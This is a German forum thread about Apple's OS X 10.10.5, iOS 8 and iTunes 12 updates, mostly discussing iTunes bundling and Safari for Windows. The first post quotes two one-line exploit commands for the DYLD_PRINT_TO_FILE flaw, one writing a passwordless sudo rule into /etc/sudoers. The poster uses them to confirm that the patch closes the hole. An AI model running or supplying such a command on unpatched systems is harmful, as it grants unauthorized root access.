News Apple: Updates für OS X Yosemite, iOS 8 und iTunes 12

Kann bestätigen, dass die 10.10.4 Lücke weg ist. Bei der EIngabe von:

Code:
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

kommt die Meldung:

bash: line 1: 3: Bad file descriptor

gefolgt von einer Password Eingabeaufforderung

und bei:

Code:
$ EDITOR=/usr/bin/true DYLD_PRINT_TO_FILE=/this_system_is_vulnerable crontab -e

kommt es zu der Meldung:

-bash: $: command not found
 
Nur kurze Frage: wenn ich auf 10.10.5 update kommt dann automatisch iTunes 12.2.2 mit oder passiert das separat?
 
Kommt automatisch mit, nach installation des Updates hat iTunes die Versions-Nr. 12.2.2.25 bei mir.
 
Ist ein "Teil" von dem Update. Du lädst ca. 1,13 GB. Das ist das Update sowie iTunes.
 
Schade, das ist blöd. Hab noch das iTunes vor Apple music und will das nicht tauschen
 
Super, vielen dank
 
Mal so nebenbei.... Jemand n plan ob es jemals wieder safari für win geben wird? Glaskugel ... i know...
 
@derhund

Nein nimm einfach einen der anderen Webkit Browser. Opera oder Chrome sind z.B. genau wie Safari auf Webkit.
 
derhund schrieb:
Mal so nebenbei.... Jemand n plan ob es jemals wieder safari für win geben wird? Glaskugel ... i know...

Genau das wäre auch mein Favorit und es ist mehr als schade, das Apple die Weiterentwicklung eingestellt hat.
 
Bei Safari für Windows ist die Weiterentwicklung leider eingestellt worden.
 
Das ist durchaus bekannt :).
 
Für mich absolut unverständlich, grad das syncen des browsers mit ipad und iphone finde ich sehr bequem, schade, ich kann nur hoffen das da noch mal bei appl nachgedacht wird...
 
Das geht soweit mir bekannt aber nur mit Bookmarks.
 
Safari ist ein mieser Browser, den nutze ich nirgends. Mercury auf i devices und Firefox überall sonst.
Aber ehrlich ich will garnicht die gleichen bookmarks auf allen Geräten.
 
@wazzup

Das Problem an Safari, CHrome und all den anderen sind einfach die Addons. Die Browser an sich sind super vor allem Schnell aber sie haben halt für mich und viele andere einfach nicht die Addon Auswahl welche man mit dem Fuchs hat.
 
Stimmt, unter OS X und unter iOS sowieso gibt es kaum was schnelleres als Safari. Aber wie du schon sagst, ohne Addons kann ich genauso gut den IE benutzen. Geschwindigkeit ist nicht alles.
 
Auch für Safari gibt es einige Addons, ich vermisse jedenfalls für meinen Zweck keine.
 
Zurück
Oben